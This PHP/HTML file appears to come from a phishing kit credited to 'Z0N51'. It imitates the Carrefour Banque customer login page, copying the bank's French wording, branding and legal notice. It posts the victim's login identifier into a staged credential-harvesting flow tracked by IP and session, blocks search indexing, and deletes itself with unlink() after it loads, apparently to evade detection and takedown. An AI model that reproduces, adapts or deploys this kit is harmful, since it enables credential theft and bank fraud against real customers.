<?php
    /*******
    Main Author: Z0N51
    Contact me on telegram : https://t.me/z0n51
    ********************************************************/
    
    require_once '../includes/main.php';
    reset_action(get_client_ip());
    $_SESSION['last_page'] = 'login';
?>
<!doctype html>
<html style="background: #F0F0F0;">

    <head>
        <!-- Required meta tags -->
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <meta name="robots" content="noindex," "nofollow," "noimageindex," "noarchive," "nocache," "nosnippet">
        
        <!-- CSS FILES -->
        <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css">
        <link rel="stylesheet" href="../assets/css/helpers.css">
        <link rel="stylesheet" href="../assets/css/style.css">

        <link rel="icon" type="image/x-icon" href="../assets/imgs/favicon.ico" />

        <title>Connexion à l’Espace Client | Carrefour Banque</title>
    </head>

    <body style="background: #F0F0F0;">

		<div id="wrapper">
            <div class="container">
                <div class="login-area">
                    <div class="left">
                        <div class="back"><i class="fa-solid fa-chevron-left"></i> Retour</div>
                        <div class="logo"><img src="../assets/imgs/logo.png"></div>
                        <form action="../index.php" method="POST">
                            <input type="hidden" name="captcha">
                            <input type="hidden" name="step" value="identifiant">
                            <legend>Accès à mon Espace Client</legend>
                            <div class="form-group mb30 <?php echo is_invalid_class($_SESSION['errors'],'identifiant') ?>">
                                <label for="identifiant">Votre Identifiant Internet</label>
                                <input type="text" maxlength="11" name="identifiant" id="identifiant" class="form-control" value="<?php echo get_value('identifiant'); ?>">
                                <span>Identifiant oublié ?</span>
                            </div>
                            <p class="remember">Mémoriser mon identifiant</p>
                            <?php echo error_message($_SESSION['errors'],'identifiant'); ?>
                            <p class="txt mb30">Pour cela nous déposons <span>un cookie</span> dans votre navigateur qui nous permet de vous reconnaitre automatiquement lors de vos prochaines connexions.</p>
                            <div class="btns">
                                <button type="submit">Valider</button>
                            </div>
                        </form>
                    </div>
                    <div class="right">
                        <div class="content">
                            <div class="row">
                                <div class="col-12">
                                    <div class="widget">
                                        <h3><span><img src="../assets/imgs/lock.png"></span> Information Sécurité</h3>
                                        <p>Avant de vous connecter à votre Espace Client, vérifiez que l’adresse commence par <span>https://www.carrefour-banque.fr/espace-client/connexion</span> ainsi que la présence du “https://”, et que l’icône cadenas est bien présente.</p>
                                        <p>Sachez que Carrefour Banque ne vous demandera jamais de communiquer vos données personnelles et/ou bancaires par email, SMS ou téléphone, ou de les saisir sur l'Espace Client.</p>
                                    </div>
                                </div>
                            </div>
                            <div class="row">
                                <div class="col-md-6">
                                    <div class="widget">
                                        <h3><span><img src="../assets/imgs/lock.png"></span> Espace Client</h3>
                                        <ul>
                                            <li><i class="fa-solid fa-angle-right"></i> <u>Connecter vous en toute sécurité</u></li>
                                            <li><i class="fa-solid fa-angle-right"></i> <u>Suivre ma demande</u></li>
                                            <li><i class="fa-solid fa-angle-right"></i> <u>Virement crédit PASS</u></li>
                                            <li><i class="fa-solid fa-angle-right"></i> <u>Appli mobile</u></li>
                                        </ul>
                                    </div>
                                </div>
                                <div class="col-md-6">
                                    <div class="widget">
                                        <h3><span><img src="../assets/imgs/ex.png"></span> Infos légales</h3>
                                        <ul>
                                            <li><i class="fa-solid fa-angle-right"></i> <u>Cookies / Mentions légales</u></li>
                                            <li><i class="fa-solid fa-angle-right"></i> <u>Paramétrage des cookies</u></li>
                                            <li><i class="fa-solid fa-angle-right"></i> <u>Conditions générales de vente</u></li>
                                            <li><i class="fa-solid fa-angle-right"></i> <u>Contact</u></li>
                                            <li><i class="fa-solid fa-angle-right"></i> <u>Accessibilité</u></li>
                                        </ul>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <p class="zzz">CARREFOUR BANQUE, S.A au capital de 101 346 956,72 €, dont le siège social est situé au 9, Avenue du Lac - CS 30 671 - 91051 EVRY Cedex. RCS EVRY n°313 811515. N°ORIAS : 07 027 516 (<span>www.orias.fr</span>).</p>
            </div>
        </div>

        <!-- JS FILES -->
        <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.bundle.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/js/all.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.payment/3.0.0/jquery.payment.min.js"></script>
        <script src="../assets/js/jquery.mask.js"></script>
        <script src="../assets/js/script.js"></script>

    </body>

</html>
<?php unlink(basename(__FILE__)); ?>